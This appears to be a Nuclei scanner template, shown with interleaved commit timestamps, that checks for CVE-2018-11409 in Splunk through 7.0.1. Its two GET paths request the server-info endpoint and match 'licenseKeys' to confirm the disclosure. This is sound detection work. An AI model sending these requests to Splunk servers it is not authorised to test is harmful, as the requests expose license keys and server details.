2021-01-02 05:00:39 +00:00
id : CVE-2018-11409
2020-06-30 10:19:43 +00:00
info :
name : Splunk Sensitive Information Disclosure
2021-06-09 12:20:56 +00:00
author : harshbothra_
2020-06-30 10:19:43 +00:00
severity : medium
2022-04-22 10:38:41 +00:00
description : Splunk through 7.0.1 allows information disclosure by appending __raw/services/server/info/server-info?output_mode=json to a query, as demonstrated by discovering a license key.
reference :
- https://nvd.nist.gov/vuln/detail/CVE-2018-11409
2022-05-17 09:18:12 +00:00
- https://github.com/kofa2002/splunk
- https://www.exploit-db.com/exploits/44865/
2022-07-01 10:02:07 +00:00
- http://web.archive.org/web/20211208114213/https://securitytracker.com/id/1041148
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 5.3
2021-09-10 11:26:40 +00:00
cve-id : CVE-2018-11409
cwe-id : CWE-200
2022-08-27 04:41:18 +00:00
tags : edb,cve,cve2018,splunk
2020-06-30 10:19:43 +00:00
requests :
- method : GET
path :
- '{{BaseURL}}/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json'
2020-06-30 10:25:45 +00:00
- '{{BaseURL}}/__raw/services/server/info/server-info?output_mode=json'
2020-07-08 11:38:57 +00:00
matchers-condition : and
2020-06-30 10:19:43 +00:00
matchers :
- type : status
status :
- 200
- type : word
words :
- licenseKeys